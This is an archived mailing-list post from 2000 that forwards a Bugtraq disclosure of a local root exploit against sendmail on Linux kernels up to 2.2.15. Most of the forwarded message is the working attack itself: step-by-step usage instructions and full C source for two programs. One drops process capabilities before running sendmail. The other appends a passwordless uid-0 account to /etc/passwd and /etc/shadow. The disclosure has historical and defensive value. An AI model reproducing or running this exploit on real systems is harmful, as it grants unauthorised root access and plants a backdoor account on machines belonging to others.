[Subject Prev][Subject Next][Thread Prev][Thread Next][Subject Index][Thread Index]

[sm@krec.ernet.in: Sendmail local root exploit on linux 2.2.x (fwd)]

To: linux-india-programmers@xxxxxxxxxxxxxxxxxxxxx
Subject: [sm@krec.ernet.in: Sendmail local root exploit on linux 2.2.x (fwd)]
From: liadmin@xxxxxxxxx
Date: Sat, 10 Jun 2000 10:29:53 -0700

Here is an example demonstrating the root exploit that was recently
discovered in sendmail+kernel (<= 2.2.15).  It is not directly related
to linux in india.  But is useful, neverthless, to understand how the
exploit works.  Please don't flame pgm.

Thaths

--- Begin Message ---

To: Linux-India-Help <linux-india-help-owner@xxxxxxxxxxxxxxxxxxxxx>
Subject: Sendmail local root exploit on linux 2.2.x (fwd)
From: P G Mohanan <sm@xxxxxxxxxxxxx>
Date: Sat, 10 Jun 2000 10:01:15 +0530 (IST)
Sender: majordomo2-owner@xxxxxxxxxxxxxxxxxxxxx

Hi,

I hope this mail will reach the list owner.

Since many people who use sendmail on linux might not have seen
this message , I suggest that this info may be made available to
the people. [ I don't know whether this is already done ]

At the same time , I don't know the implications of putting it on
the list. I hope the decision must be that of the list-admin.

Please ignore the message if this information is insignificant or
false.

With regards
 --pgm
-------------------------------
P G Mohanan, Systems Manager 
Central Computer Centre
KREC Surathkal
Email:pgm@xxxxxxxxxxxxx
      sm@xxxxxxxxxxxxx
Phone: 0824-475984 ext 301
------------------------------

---------- Forwarded message ----------
Date: Thu, 8 Jun 2000 14:21:48 +0200
From: Florian Heinz <sky@xxxxxxxxxxxxx>
To: BUGTRAQ@xxxxxxxxxxxxxxxxx
Subject: Sendmail local root exploit on linux 2.2.x

Hello all,

Attached is a file with 2 sources, ex.c and add.c

compile these 2 and create a file "mail":

From: yomama@xxxxxxxxxx
To: localuser@xxxxxxxxxxxxxxx
Subject: foo
bar
.

then create a .forward with:
|/path/to/add

then just do: ./ex < mail

this should add a user yomama with uid/gid = 0 and without a password
set
a simple su - yomama should give you root.

This exploit was written by me in a hurry, I hope there are no mistakes

Greets

Florian Heinz

-- snip -- ex.c --

#include <linux/capability.h>

int main (void) {
   cap_user_header_t header;
   cap_user_data_t data;

   header = malloc(8);
   data = malloc(12);

   header->pid = 0;
   header->version = _LINUX_CAPABILITY_VERSION;

   data->inheritable = data->effective = data->permitted = 0;
   capset(header, data);

   execlp("/usr/sbin/sendmail", "sendmail", "-t", NULL);
}

-- snap -- ex.c --

-- snip -- add.c --

#include <fcntl.h>

int main (void) {
   int fd;
   char string[40];

   seteuid(0);
   fd = open("/etc/passwd", O_APPEND|O_WRONLY);
   strcpy(string, "yomama:x:0:0::/root:/bin/sh\n");
   write(fd, string, strlen(string));
   close(fd);
   fd = open("/etc/shadow", O_APPEND|O_WRONLY);
   strcpy(string, "yomama::11029:0:99999:7:::");
   write(fd, string, strlen(string));
   close(fd);

}

-- snap -- add.c --

--- End Message ---

Follow-Ups:
- Re: [sm@krec.ernet.in: Sendmail local root exploit on linux 2.2.x (fwd)]
  - From: Pallav Nawani

Prev by Subject: Re: [off-topic for LIP]
Next by Subject: Re: [sm@krec.ernet.in: Sendmail local root exploit on linux 2.2.x (fwd)]
Previous by thread: Re: Magic Garden: Explained
Next by thread: Re: [sm@krec.ernet.in: Sendmail local root exploit on linux 2.2.x (fwd)]
Index(es):
- Subject
- Thread